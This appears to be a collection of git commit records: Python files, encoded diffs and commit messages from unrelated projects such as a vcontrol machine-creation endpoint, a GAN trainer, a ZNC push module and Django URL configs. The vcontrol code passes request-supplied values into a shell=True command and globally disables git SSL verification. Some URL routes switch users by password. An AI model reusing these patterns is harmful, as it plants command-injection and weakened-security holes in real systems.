data = json.loads(response)
for service in data["services"]:
yield service
page_url = filter(lambda l: l['rel'] == 'next', data['links'])
if page_url:
page_url = page_url[0]['href']
def process_json_files_in_directory(dirname):
for filename in os.listdir(dirname):
with open(os.path.join(dirname, filename)) as f:
data = json.loads(f.read())
print "doing " + filename
yield data
def main():
if len(sys.argv) == 4:
es_endpoint, endpoint, token = sys.argv[1:]
for data in request_services(endpoint, token):
post_to_es(es_endpoint, data)
elif len(sys.argv) == 3:
es_endpoint, listing_dir = sys.argv[1:]
for data in process_json_files_in_directory(listing_dir):
post_to_es(es_endpoint, data)
else:
print __doc__
if __name__ == '__main__':
main()
|
Python
| 0
|
@@ -2834,431 +2834,98 @@
-print request.get_full_url()%0A print request.get_data()%0A%0A try:%0A connection = opener.open(request)%0A except urllib2.HTTPError, e:%0A connection = e%0A print connection%0A%0A # check. Substitute with appropriate HTTP code.%0A if connection.code == 200:%0A data = connection.read()%0A print str(connection.code) + %22 %22 + data%0A else:%0A print %22connection.code = %22 + str(connection.code)
+try:%0A opener.open(request)%0A except urllib2.HTTPError, error:%0A print error
%0A%0A%0Ad
@@ -3114,18 +3114,24 @@
nt %22
-request
+process
ing
+ page:
%7B%7D%22
|
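Decoded, post_to_es's request/response dump collapses to a bare error handler, and the paging message is reworded; the touched fragments read:

    # in post_to_es()
    try:
        opener.open(request)
    except urllib2.HTTPError, error:
        print error

    # in request_services()
    print "processing page: {}".format(page_url)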
237f85009e2d8669e75c1e7e9ae3940efe7a151d
|
update vent version and pull recursively
|
vcontrol/rest/machines/create.py
|
vcontrol/rest/machines/create.py
|
from ..helpers import get_allowed
import ast
import json
import os
import subprocess
import web
class CreateMachineR:
"""
This endpoint is for creating a new machine of Vent on a provider.
"""
allow_origin, rest_url = get_allowed.get_allowed()
def OPTIONS(self):
return self.POST()
def POST(self):
web.header('Access-Control-Allow-Origin', self.allow_origin)
web.header('Access-Control-Allow-Headers', "Content-type")
data = web.data()
payload = {}
try:
payload = ast.literal_eval(data)
if type(payload) != dict:
payload = ast.literal_eval(json.loads(data))
except:
return "malformed json body"
# TODO add --engine-label(s) vent specific labels
engine_labels = "--engine-label vcontrol_managed=yes "
try:
if os.path.isfile('providers.txt'):
with open('providers.txt', 'r') as f:
for line in f:
if line.split(":")[0] == payload['provider']:
# add --engine-label for group specified in payload
if "group" in payload:
engine_labels += "--engine-label vcontrol_group="+payload["group"]+" "
# !! TODO add any additional --engine-label(s) in payload
if "labels" in payload:
if payload["labels"] != "":
labels = payload["labels"].split(",")
for label in labels:
engine_labels += "--engine-label "+label+" "
proc = None
cleanup = False
if line.split(":")[1] == 'openstack' or line.split(":")[1] == 'vmwarevsphere':
# TODO check usage stats first and make sure it's not over the limits (capacity)
cmd = "/usr/local/bin/docker-machine create "+engine_labels+"-d "+line.split(":")[1]+" "+line.split(":")[5].strip()
if line.split(":")[1] == 'vmwarevsphere':
if payload['iso'] == '/tmp/vent/vent.iso':
cmd += ' --vmwarevsphere-boot2docker-url=https://github.com/CyberReboot/vent/releases/download/v0.1.0/vent.iso'
else:
cmd += ' --vmwarevsphere-boot2docker-url='+payload['iso']
elif line.split(":")[1].strip() == "virtualbox":
cmd = "/usr/local/bin/docker-machine create "+engine_labels+"-d "+line.split(":")[1].strip()
if payload['iso'] == '/tmp/vent/vent.iso':
if not os.path.isfile('/tmp/vent/vent.iso'):
cleanup = True
os.system("git config --global http.sslVerify false")
os.system("cd /tmp && git clone https://github.com/CyberReboot/vent.git")
os.system("cd /tmp/vent && make")
proc = subprocess.Popen(["nohup", "python", "-m", "SimpleHTTPServer"], cwd="/tmp/vent")
cmd += ' --virtualbox-boot2docker-url=http://localhost:8000/vent.iso'
cmd += ' --virtualbox-cpu-count "'+str(payload['cpus'])+'" --virtualbox-disk-size "'+str(payload['disk_size'])+'" --virtualbox-memory "'+str(payload['memory'])+'"'
else:
cmd = "/usr/local/bin/docker-machine create "+engine_labels+"-d "+line.split(":")[1]+" "+line.split(":")[2].strip()
if line.split(":")[1] == "vmwarevsphere":
cmd += ' --vmwarevsphere-cpu-count "'+str(payload['cpus'])+'" --vmwarevsphere-disk-size "'+str(payload['disk_size'])+'" --vmwarevsphere-memory-size "'+str(payload['memory'])+'"'
cmd += ' '+payload['machine']
output = subprocess.check_output(cmd, shell=True)
if proc != None:
os.system("kill -9 "+str(proc.pid))
if cleanup:
shutil.rmtree('/tmp/vent')
return output
return "provider specified was not found"
else:
return "no providers, please first add a provider"
except:
return "unable to create machine"
|
Python
| 0
|
@@ -2458,17 +2458,17 @@
ad/v0.1.
-0
+1
/vent.is
@@ -3190,16 +3190,28 @@
t clone
+--recursive
https://
|
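Decoded, the two touched lines bump the vSphere boot2docker ISO to the v0.1.1 release and make the vent clone recursive:

cmd += ' --vmwarevsphere-boot2docker-url=https://github.com/CyberReboot/vent/releases/download/v0.1.1/vent.iso'
os.system("cd /tmp && git clone --recursive https://github.com/CyberReboot/vent.git")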
be929d518ff320ed8e16f57da55f0855800f7408
|
Use multi_reduce instead of reduce in enum file loading
|
src/engine/file_loader.py
|
src/engine/file_loader.py
|
import os
import json
from lib import contract
data_dir = os.path.join(os.environ['PORTER'], 'data')
@contract.accepts(str)
@contract.returns(list)
def read_and_parse_json(data_type):
sub_dir = os.path.join(data_dir, data_type)
def full_path(file_name):
return os.path.join(sub_dir, file_name)
def only_json(file_name):
return file_name.endswith('.json')
def load_json(json_file_name):
with open(json_file_name) as json_file:
return json.load(json_file)
return map(load_json, filter(only_json, map(full_path, os.listdir(sub_dir))))
@contract.accepts(str)
@contract.returns(dict)
def load_enum(struct_name):
def create_enum_map(enum_map, args):
enumeration, enum_type = args
enum_map[str(enum_type)] = enumeration
return enum_map
return reduce(create_enum_map, enumerate(read_and_parse_json(struct_name)[0]), {})
@contract.accepts(str)
@contract.returns(dict)
def load_struct(struct_name):
def create_struct_map(struct_map, struct_):
struct_map[str(struct_['name'])] = struct_
return struct_map
return reduce(create_struct_map, read_and_parse_json(struct_name), {})
|
Python
| 0
|
@@ -40,16 +40,28 @@
contract
+, functional
%0A%0Adata_d
@@ -715,23 +715,8 @@
map,
- args):%0A
enu
@@ -738,15 +738,10 @@
type
- = args
+):
%0A
@@ -816,31 +816,57 @@
%0A return
-reduce(
+functional.multi_reduce(%0A
create_enum_
|
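Decoded, functional joins the import and create_enum_map takes the enumerate pair as two positional arguments, matching multi_reduce's calling convention; load_enum ends up as:

from lib import contract, functional

@contract.accepts(str)
@contract.returns(dict)
def load_enum(struct_name):
    def create_enum_map(enum_map, enumeration, enum_type):
        enum_map[str(enum_type)] = enumeration
        return enum_map
    return functional.multi_reduce(
        create_enum_map, enumerate(read_and_parse_json(struct_name)[0]), {})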
a429ce49dc5ed823a33c5a4fa64bd92b422b9b10
|
change imports
|
BEGAN/train.py
|
BEGAN/train.py
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import tensorflow as tf
import numpy as np
import time
import began
import sys
sys.path.insert(0, '../')
import datasets
import image_utils as iu
dirs = {
'sample_output': './BEGAN/',
'checkpoint': './model/checkpoint',
'model': './model/BEGAN-model.ckpt'
}
paras = {
'epoch': 250,
'batch_size': 16,
'logging_interval': 1000
}
def main():
start_time = time.time() # clocking start
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.95)
config = tf.ConfigProto(allow_soft_placement=True, gpu_options=gpu_options)
with tf.Session(config=config) as s:
end_time = time.time() - start_time
# BEGAN Model
model = began.BEGAN(s)
# initializing
s.run(tf.global_variables_initializer())
# load model & graph & weight
ckpt = tf.train.get_checkpoint_state('./model/')
if ckpt and ckpt.model_checkpoint_path:
# Restores from checkpoint
model.saver.restore(s, ckpt.model_checkpoint_path)
global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]
print("[+] global step : %s" % global_step, " successfully loaded")
else:
global_step = 0
print('[-] No checkpoint file found')
# return
# initializing variables
tf.global_variables_initializer().run()
# loading Celeb-A dataset
ds = datasets.DataSet(input_height=64,
input_width=64,
input_channel=64,
dataset_name="celeb-a")
images = ds.images
sample_z = np.random.uniform(-1., 1., size=(model.sample_num, model.z_dim)).astype(np.float32)
d_overpowered = False
kt = tf.Variable(0., dtype=tf.float32) # init K_0 value, 0
batch_per_epoch = int(len(images) / paras['batch_size'])
for epoch in range(paras['epoch']):
for step in range(batch_per_epoch):
iter_ = datasets.DataIterator([images], paras['batch_size'])
# k_t update
# k_t+1 = K_t + lambda_k * (gamma * d_real - d_fake)
kt = kt + model.lambda_k * (model.gamma * model.D_real - model.D_fake)
# z update
batch_z = np.random.uniform(-1., 1., [paras['batch_size'], model.z_dim]).astype(np.float32)
# update D network
if not d_overpowered:
s.run(model.d_op, feed_dict={model.x: 0,
model.z: batch_z,
model.kt: kt})
# update G network
s.run(model.g_op, feed_dict={model.z: batch_z,
model.kt: kt})
if global_step % paras['logging_interval'] == 0:
batch_z = np.random.uniform(-1., 1., [paras['batch_size'], model.z_dim]).astype(np.float32)
d_loss, g_loss, summary = s.run([
model.d_loss,
model.g_loss,
model.merged
], feed_dict={
model.x: 0,
model.z: batch_z
})
# print loss
print("[+] Epoch %03d Step %05d => " % (epoch, step),
"D loss : {:.8f}".format(d_loss), " G loss : {:.8f}".format(g_loss))
# update overpowered
d_overpowered = d_loss < g_loss / 3
# training G model with sample image and noise
samples = s.run(model.G, feed_dict={
model.x: 0,
model.z: sample_z
})
# summary saver
model.writer.add_summary(summary, step)
# export image generated by model G
sample_image_height = model.sample_size
sample_image_width = model.sample_size
sample_dir = dirs['sample_output'] + 'train_{0}_{1}.png'.format(epoch, step)
# Generated image save
iu.save_images(samples, size=[sample_image_height, sample_image_width], image_path=sample_dir)
# model save
model.saver.save(s, dirs['model'], global_step=step)
global_step += 1
# elapsed time
print("[+] Elapsed time {:.8f}s".format(end_time))
# close tf.Session
s.close()
if __name__ == '__main__':
main()
|
Python
| 0.000001
|
@@ -215,23 +215,50 @@
')%0A%0A
-import datas
+from datasets import DataIterator, DataS
et
-s
%0Aimp
@@ -1564,25 +1564,16 @@
ds =
-datasets.
DataSet(
@@ -1606,33 +1606,24 @@
-
input_width=
@@ -1643,33 +1643,24 @@
-
-
input_channe
@@ -1661,29 +1661,19 @@
channel=
-64,%0A
+3,%0A
|
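Decoded, the module import becomes explicit names and the Celeb-A channel count is corrected from 64 to 3; the touched lines read roughly as below (no hunk is shown for the later datasets.DataIterator call, so it is left as-is here):

from datasets import DataIterator, DataSet

ds = DataSet(input_height=64,
             input_width=64,
             input_channel=3,
             dataset_name="celeb-a")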
ecc21e3fccc41413686389735da93e0488779cc4
|
Add a test command
|
pypush.py
|
pypush.py
|
# Simple Push Python Module
import znc
import re
import http.client, urllib
import traceback
class pypush(znc.Module):
module_types = [znc.CModInfo.UserModule]
description = "Push python3 module for ZNC"
def OnLoad(self, sArgs, sMessage):
self.nick = ''
self.debug = False
return znc.CONTINUE
def PutModuleDbg(self, s):
if self.debug:
self.PutModule(s)
def PushMsg(self, title, msg):
self.PutModuleDbg("{0} -- {1}".format(title, msg))
conn = http.client.HTTPSConnection("api.pushover.net:443")
conn.request("POST", "/1/messages.json",
urllib.parse.urlencode({
"token": self.nv['token'],
"user": self.nv['user'],
"title": title,
"message": msg,
}), { "Content-type": "application/x-www-form-urlencoded" })
conn.getresponse()
def Highlight(self, message):
if self.nick != self.GetNetwork().GetCurNick():
self.nick = self.GetNetwork().GetCurNick()
words = [self.nick, ] + self.nv['highlight'].split()
self.HighlightRE = re.compile(r'\b({0})\b'.format('|'.join(words)), flags=re.IGNORECASE).search
return self.HighlightRE(message)
def OnChanMsg(self, nick, channel, message):
if self.Highlight(message.s):
self.PushMsg("Highlight", "{0}: [{1}] {2}".format(channel.GetName(), nick.GetNick(), message.s))
return znc.CONTINUE
def OnPrivMsg(self, nick, message):
self.PushMsg("Private", "[{0}] {1}".format(nick.GetNick(), message.s))
return znc.CONTINUE
def OnModCommand(self, commandstr):
argv = commandstr.split()
try:
self.PutModule("Command!! {0}".format(argv))
method = getattr(self, "DoCommand_" + argv[0].replace('-','_').lower(), self.DoCommandNotUnderstood)
method(argv)
except Exception:
self.PutModule("Command Exception!! {0} -> {1}".format(argv, traceback.format_exc()))
return znc.CONTINUE
def DoCommandNotUnderstood(self, argv):
self.PutModule("Command Not Understood: {0}".format(argv))
def DoCommand_setuser(self, argv):
try:
self.nv['user'] = argv[1]
self.PutModule("Pushover user set")
except Exception:
self.PutModule("SetUser requires a Pushover user string");
def DoCommand_settoken(self, argv):
try:
self.nv['token'] = argv[1]
self.PutModule("Pushover token set")
except Exception:
self.PutModule("SetToken requires a Pushover token string");
def DoCommand_sethighlight(self, argv):
self.nv['highlight'] = ' '.join(argv[1:])
self.nick = '' # unset the nick to regenerate the re
def DoCommand_debug(self, argv):
self.debug = not self.debug
self.PutModule("Debug {0}".format(self.debug));
|
Python
| 0.000797
|
@@ -3004,9 +3004,137 @@
bug));%0A%0A
+ def DoCommand_test(self, argv):%0A self.PushMsg(%22Test%22, %22%7B0%7D%22.format(' '.join(argv%5B0:%5D)))%0A return znc.CONTINUE%0A%0A
%0A
|
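Decoded, the new handler (dispatched by OnModCommand's DoCommand_ lookup) is:

    def DoCommand_test(self, argv):
        self.PushMsg("Test", "{0}".format(' '.join(argv[0:])))
        return znc.CONTINUE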
9d74f2ebfc0a635026544a977380593e90b4150d
|
upgrade (goflow.workflow independence)
|
leavedemo/urls.py
|
leavedemo/urls.py
|
from django.conf.urls.defaults import *
from django.conf import settings
from leave.forms import StartRequestForm, RequesterForm, CheckRequestForm
from os.path import join, dirname
_dir = join(dirname(__file__))
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# FOR DEBUG AND TEST ONLY
(r'^.*/accounts/login.*switch/(?P<username>.*)/(?P<password>.*)/$', 'goflow.workflow.views.debug_switch_user', {'redirect':'/leave/'}),
(r'^.*/switch/(?P<username>.*)/(?P<password>.*)/$', 'goflow.workflow.views.debug_switch_user'),
# user connection
(r'^.*/logout/$', 'django.contrib.auth.views.logout'),
(r'^.*/accounts/login/$', 'django.contrib.auth.views.login', {'template_name':'goflow/login.html'}),
(r'^.*/password_change/$', 'django.contrib.auth.views.password_change'),
# static
(r'^images/(?P<path>.*)$', 'django.views.static.serve', {'document_root': join(_dir, 'media/img'), 'show_indexes': True}),
(r'^files/(.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),
# home redirection
(r'^.*/home/$', 'django.views.generic.simple.redirect_to', {'url':'/leave/'}),
# home page
(r'^leave/$', 'django.views.generic.simple.direct_to_template', {'template':'leave.html'}),
# starting application
(r'^leave/start/$', 'goflow.apptools.views.start_application', {'process_name':'leave',
'form_class':StartRequestForm,
'template':'start_leave.html'}),
# applications
(r'^leave/checkstatus/(?P<id>.*)/$', 'goflow.apptools.views.edit_model', {'form_class':CheckRequestForm,
'template':'checkstatus.html'}),
(r'^leave/checkstatus_auto/$', 'leavedemo.leave.views.checkstatus_auto', {'notif_user':True}),
(r'^leave/refine/(?P<id>.*)/$', 'goflow.apptools.views.edit_model', {'form_class':RequesterForm,
'template':'refine.html'}),
(r'^leave/approvalform/(?P<id>.*)/$', 'goflow.apptools.views.edit_model', {'form_class':CheckRequestForm,
'template':'approval.html'}),
(r'^leave/hrform/(?P<id>.*)/$', 'goflow.apptools.views.view_application', {'template':'hrform.html'}),
(r'^leave/hr_auto/$', 'leavedemo.leave.auto.update_hr'),
(r'^leave/finalinfo/(?P<id>.*)/$', 'goflow.apptools.views.view_application', {'template':'finalinfo.html'}),
# administration
(r'^leave/admin/workflow/', include('goflow.urls_admin')),
(r'^leave/admin/graphics2/', include('goflow.graphics2.urls_admin')),
(r'^leave/admin/(.*)', admin.site.root),
# Goflow pages
(r'^leave/', include('goflow.urls')),
(r'^leave/send_mail/$', 'goflow.workflow.notification.send_mail'),
)
|
Python
| 0
|
@@ -2808,24 +2808,33 @@
ude('goflow.
+apptools.
urls_admin')
|
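Decoded, the lone change re-points the workflow admin include at the apptools subpackage:

    (r'^leave/admin/workflow/', include('goflow.apptools.urls_admin')),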
1df66cc442e93d85fd8a8bbab2815574387a8952
|
Remove print
|
doc/examples/brain_extraction_dwi.py
|
doc/examples/brain_extraction_dwi.py
|
"""
=================================================
Brain segmentation with dipy.segment.mask.
=================================================
We show how to extract brain information and mask from a b0 image using dipy's
segment.mask module.
First import the necessary modules:
"""
import os.path
import numpy as np
import nibabel as nib
"""
Download and read the data for this tutorial.
The scil_b0 dataset contains different data from different companies and models.
For this example, the data comes from a 3 tesla GE MRI.
"""
from dipy.data import fetch_scil_b0, read_scil_b0
fetch_scil_b0()
img = read_scil_b0()
data = np.squeeze(img.get_data())
"""
img contains a nibabel Nifti1Image object. Data is the actual brain data as a
numpy ndarray.
Segment the brain using dipy's mask module.
`medotsu` returns the segmented brain data and a binary mask of the brain.
It is possible to fine-tune `medotsu`'s parameters (median_radius and
num_pass) if extraction yields incorrect results but the default parameters work
well on most volumes. For this example, default parameters (4, 4) will be used.
"""
print('Segmenting brain data from GE 3T b0 volume...')
from dipy.segment.mask import medotsu
b0_mask, mask = medotsu(data.copy(), 4, 4)
"""
Saving the segmentation results is very easy using nibabel. We need the b0_mask,
and the binary mask volumes. The affine matrix which transform the image's
coordinates to the world coordinates is also needed. Here, we choose to save
both images in float32.
"""
mask_img = nib.Nifti1Image(mask.astype(np.float32), img.get_affine())
b0_img = nib.Nifti1Image(b0_mask.astype(np.float32), img.get_affine())
fname = './ge_3t'
nib.save(mask_img, fname+'_binary_mask.nii.gz')
nib.save(b0_img, fname+'_mask.nii.gz')
"""
Quick view of the middle slice of the results using matplotlib.
"""
import matplotlib.pyplot as plt
slice = data.shape[2]/2
plt.figure('Brain segmentation')
plt.subplot(1,2,1)
plt.imshow(data[:,:,slice])
plt.subplot(1,2,2)
plt.imshow(b0_mask[:,:,slice])
plt.show()
"""
`medotsu` can also automatically crop the outputs to remove the largest possible
number of background voxels. This makes the outputted data significantly smaller.
`medotsu`'s auto cropping is activated by setting the autocrop parameter to True.
"""
b0_mask_crop, mask_crop = medotsu(data.copy(), 4, 4, autocrop=True)
"""
Saving cropped data using nibabel as demonstrated previously.
"""
mask_img_crop = nib.Nifti1Image(mask_crop.astype(np.float32), img.get_affine())
b0_img_crop = nib.Nifti1Image(b0_mask_crop.astype(np.float32), img.get_affine())
nib.save(mask_img_crop, fname+'_binary_mask_crop.nii.gz')
nib.save(b0_img_crop, fname+'_mask_crop.nii.gz')
|
Python
| 0.000016
|
@@ -1114,63 +1114,8 @@
%22%22%0A%0A
-print('Segmenting brain data from GE 3T b0 volume...')%0A
from
|
51b716cc00efd0d0c93ffc11f4cd7242446bad88
|
Remove unused pyrax import
|
nodes/management/commands/create_images.py
|
nodes/management/commands/create_images.py
|
from gevent import monkey
monkey.patch_all()
import gevent
import os
from django.core.management import BaseCommand
from django.conf import settings
from ...utils import connect_to_node, logger, pyrax
class Command(BaseCommand):
help = 'create nodes images'
def handle(self, *args, **kwargs):
self._root = os.path.join(settings.PROJECT_ROOT, 'nodes', 'images')
self._create_image('raw')
tasks = [
gevent.spawn(self._create_image, image, image_name='raw')
for image in os.listdir(self._root) if image != 'raw'
]
gevent.joinall(tasks)
def _create_image(self, name, **kwargs):
"""Create image"""
image_root = os.path.join(self._root, name)
with connect_to_node(**kwargs) as node:
node.put(image_root, '/root/{name}/'.format(name=name))
out = node.execute('''
cd /root/{name}/
bash bootstrap.sh
'''.format(name=name))
logger.info(out.stdout)
logger.info(out.stderr)
node.save_image(name)
|
Python
| 0
|
@@ -191,15 +191,8 @@
gger
-, pyrax
%0A%0A%0Ac
|
9ca88c5cd7f52c6f064a1d5edb003471f6223a74
|
Change label on click
|
Winston.py
|
Winston.py
|
import sys
from PyQt4.QtGui import *
#from PyQt4.QtWidgets import *
from PyQt4.QtCore import *
from core.Messenger import *
from core.Events import *
from alexa import AlexaService
class QTApp(QWidget):
def __init__(self):
super(QWidget, self).__init__()
self.title = 'Winston'
self.setWindowTitle(self.title)
self.setGeometry(100,100,800,400)
self.btn = QPushButton('', self)
self.alexaService = AlexaService()
self.messenger = getMessenger()
self.initUI()
def initUI(self):
b = QLabel(self)
b.setText("Hi, I am Winston. How can I help you?")
b.move(50,40)
self.btn.setCheckable(True)
self.btn.setIcon(QIcon('media/Alexa_passive.jpg'))
self.btn.setIconSize(QSize(150,150))
self.btn.setObjectName("Alexa")
self.btn.move(100,70)
self.btn.pressed.connect(self.on_press)
self.btn.released.connect(self.on_release)
self.btn.clicked.connect(self.on_click)
self.show()
@pyqtSlot()
def on_click(self):
sending_button = self.sender()
data = {'App': str(sending_button.objectName())}
self.messenger.postEvent(Events.UI_BTN_CLICKED, data)
@pyqtSlot()
def on_press(self):
sending_button = self.sender()
data = {'App': str(sending_button.objectName())}
self.btn.setIcon(QIcon('media/Alexa_active.jpg'))
self.btn.setCheckable(False);
self.messenger.postEvent(Events.UI_BTN_PRESSED, data)
@pyqtSlot()
def on_release(self):
sending_button = self.sender()
data = {'App': str(sending_button.objectName())}
self.btn.setIcon(QIcon('media/Alexa_passive.jpg'))
self.btn.setCheckable(True);
self.messenger.postEvent(Events.UI_BTN_RELEASED, data)
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = QTApp()
app.exec_()
delMessenger()
sys.exit()
|
Python
| 0
|
@@ -197,18 +197,17 @@
idget):%0A
-
%0A
+
def
@@ -521,18 +521,17 @@
nitUI()%0A
-
%0A
+
def
@@ -552,17 +552,26 @@
-b
+self.label
= QLabe
@@ -586,17 +586,26 @@
-b
+self.label
.setText
@@ -654,17 +654,26 @@
-b
+self.label
.move(50
@@ -1035,16 +1035,40 @@
click)%0A
+ self.bool = False
%0A
@@ -1080,18 +1080,17 @@
.show()%0A
-
%0A
+
@pyq
@@ -1152,32 +1152,276 @@
= self.sender()%0A
+ %0A # TODO%0A if not self.bool:%0A self.label.setText('listening ...')%0A self.bool = True%0A else:%0A self.label.setText(%22Hi, I am Winston. How can I help you?%22)%0A self.bool = False%0A%0A
data = %7B
@@ -1515,34 +1515,33 @@
_CLICKED, data)%0A
-
%0A
+
@pyqtSlot()%0A
@@ -1818,18 +1818,17 @@
, data)%0A
-
%0A
+
@pyq
@@ -2116,18 +2116,17 @@
, data)%0A
-
%0A
+
if __nam
@@ -2225,24 +2225,24 @@
Messenger()%0A
+
sys.exit
@@ -2244,9 +2244,8 @@
.exit()%0A
-%0A
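Decoded, the hunks promote the local QLabel b to self.label, seed a self.bool flag after the signal hookups, and make on_click toggle the label text. A sketch of the resulting on_click (a method fragment of the QTApp class above, with indentation restored by hand):

    @pyqtSlot()
    def on_click(self):
        sending_button = self.sender()

        # TODO
        if not self.bool:
            self.label.setText('listening ...')
            self.bool = True
        else:
            self.label.setText("Hi, I am Winston. How can I help you?")
            self.bool = False

        data = {'App': str(sending_button.objectName())}
        self.messenger.postEvent(Events.UI_BTN_CLICKED, data)

The flag turns the button into a crude listening toggle; the remaining hunks only normalize blank lines.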
|
3ced845c7735cbeb67077d8934768370545b2535
|
Set nodata value for output tiff.
|
code/readDTM.py
|
code/readDTM.py
|
# The MIT License (MIT)
# Copyright (c) 2014 Hishiv Shah
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import ogr
import shapely
import shapely.wkt
import shapely.ops
import os
import glob
import zipfile
import tempfile
import sys
import shutil
import subprocess
def readWelshDistricts(districtsShp, districtNames):
''' Read in list of district names and shapefile of district
boundaries. Returns list of WKT geometries.'''
dataSource = ogr.Open(districtsShp)
layer = dataSource.GetLayer()
layer.SetAttributeFilter("NAME IN ('%s')" % "','".join(districtNames))
geoms = []
for feature in layer:
geom = feature.GetGeometryRef().ExportToWkt()
geoms.append(geom)
return geoms
def readCatchments(catchmentsShp):
''' Read in catchments shapefiles. Returns list of WKT geometries.'''
dataSource = ogr.Open(catchmentsShp)
layer = dataSource.GetLayer()
geoms = []
for feature in layer:
geom = feature.GetGeometryRef().ExportToWkt()
geoms.append(geom)
return geoms
def readGrid(gridShp, clipper):
''' Reads in grid squares. Returns list of tile names.'''
dataSource = ogr.Open(gridShp)
layer = dataSource.GetLayer()
layer.SetSpatialFilter(ogr.CreateGeometryFromWkt(clipper))
tiles = []
for feature in layer:
tileName = feature.GetField("TILE_NAME")
tiles.append(tileName)
return tiles
def createDtmTiff(asciiDir, tileList, outTiff):
'''Extracts ESRI ASCII GRID files for specified tiles, merges and
outputs to specified tiff file.'''
# Extract DTM ascii files to temporary directory
tmpDir = tempfile.mkdtemp()
try:
for tile in tileList:
zipPath = glob.glob(os.path.join(asciiDir,
"%s" % tile[:2].lower(),
"%s*.zip" % tile.lower()))[0]
with zipfile.ZipFile(zipPath) as zFile:
zFile.extractall(tmpDir)
# Run gdal merge
subprocess.check_call(["python", "C:/OSGeo4W64/bin/gdal_merge.py",
"-o", outTiff,
"-co", "COMPRESS=LZW"] \
+ glob.glob(os.path.join(tmpDir, "*.asc")))
finally:
# Delete temporary directory
shutil.rmtree(tmpDir)
if __name__ == "__main__":
# District shapefile path
dstShp = "../data/2014-11-14/meridian2_national_653496/district_region.shp"
# Welsh district names
districtNames = ['GWYNEDD - GWYNEDD',
'SIR Y FFLINT - FLINTSHIRE',
'CASNEWYDD - NEWPORT',
'SIR YNYS MON - ISLE OF ANGLESEY',
'MERTHYR TUDFUL - MERTHYR TYDFIL',
'SIR BENFRO - PEMBROKESHIRE',
'BRO MORGANNWG - THE VALE OF GLAMORGAN',
'WRECSAM - WREXHAM',
'TOR-FAEN - TORFAEN',
'CASTELL-NEDD PORT TALBOT - NEATH PORT TALBOT',
'SIR FYNWY - MONMOUTHSHIRE',
'CAERFFILI - CAERPHILLY',
'PEN-Y-BONT AR OGWR - BRIDGEND',
'BLAENAU GWENT - BLAENAU GWENT',
'POWYS - POWYS',
'CONWY - CONWY',
'SIR DDINBYCH - DENBIGHSHIRE',
'RHONDDA CYNON TAF - RHONDDA CYNON TAF',
'SIR GAERFYRDDIN - CARMARTHENSHIRE',
'SIR CEREDIGION - CEREDIGION',
'ABERTAWE - SWANSEA',
'CAERDYDD - CARDIFF']
# Catchments shapefile
catchmentsShp = "../data/2014-11-14/nrfa/NRFA Catchment Boundary Retrieval/NRFA Catchment Boundary Retrieval_Hishiv Shah.shp"
# Grid squares shapefile
gridShp = "../data/2014-11-14/gb-grids_654971/10km_grid_region.shp"
# DTM data folder
dtmDir = "../data/2014-11-14/terr50_gagg_gb/data"
# Out tiff
outTiff = "../results/osTerrain50.tif"
# Read in district and catchment geometry
districts = readWelshDistricts(dstShp, districtNames)
catchments = readCatchments(catchmentsShp)
# Dissolve district and catchment polygons to create clipper geometry
polys = [shapely.wkt.loads(wktGeom) for wktGeom in (districts + catchments)]
clipper = shapely.ops.unary_union(polys).wkt
# Read tile names
tiles = readGrid(gridShp, clipper)
# Merge DTM tiles, output to tiff file
createDtmTiff(dtmDir, tiles, outTiff)
|
Python
| 0
|
@@ -3153,16 +3153,69 @@
utTiff,%0A
+ %22-a_nodata%22, %22-9999%22,%0A
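The single hunk inserts an -a_nodata flag into the gdal_merge.py invocation so the merged GeoTIFF records -9999 as its nodata value. The decoded call, with surrounding context from the listing:

    # Run gdal merge, tagging -9999 as the nodata value of the output tiff
    subprocess.check_call(["python", "C:/OSGeo4W64/bin/gdal_merge.py",
                           "-o", outTiff,
                           "-a_nodata", "-9999",
                           "-co", "COMPRESS=LZW"] \
                          + glob.glob(os.path.join(tmpDir, "*.asc")))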
|
2f31a1f0745214c2b06dadc1258926f7440d429f
|
Set datetime output format to ISO8601
|
abe/app.py
|
abe/app.py
|
#!/usr/bin/env python3
"""Main flask app"""
from flask import Flask, render_template, jsonify
from flask_restful import Api
from flask_cors import CORS
from flask_sslify import SSLify # redirect to https
import os
import logging
FORMAT = "%(levelname)s:ABE: _||_ %(message)s"
logging.basicConfig(level=logging.DEBUG, format=FORMAT)
from .resource_models.event_resources import EventApi
from .resource_models.label_resources import LabelApi
from .resource_models.ics_resources import ICSApi
app = Flask(__name__)
CORS(app)
SSLify(app)
api = Api(app)
# add return representations
@api.representation('application/json')
def output_json(data, code, headers=None):
resp = jsonify(data)
resp.status_code = code
resp.headers.extend(headers or {})
return resp
# Route resources
api.add_resource(EventApi, '/events/', methods=['GET', 'POST'], endpoint='event')
api.add_resource(EventApi, '/events/<string:event_id>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='event_id') # TODO: add route for string/gphycat links
api.add_resource(EventApi, '/events/<string:event_id>/<string:rec_id>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='rec_id') # TODO: add route for string/gphycat links
api.add_resource(LabelApi, '/labels/', methods=['GET', 'POST'], endpoint='label')
api.add_resource(LabelApi, '/labels/<string:label_name>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='label_name')
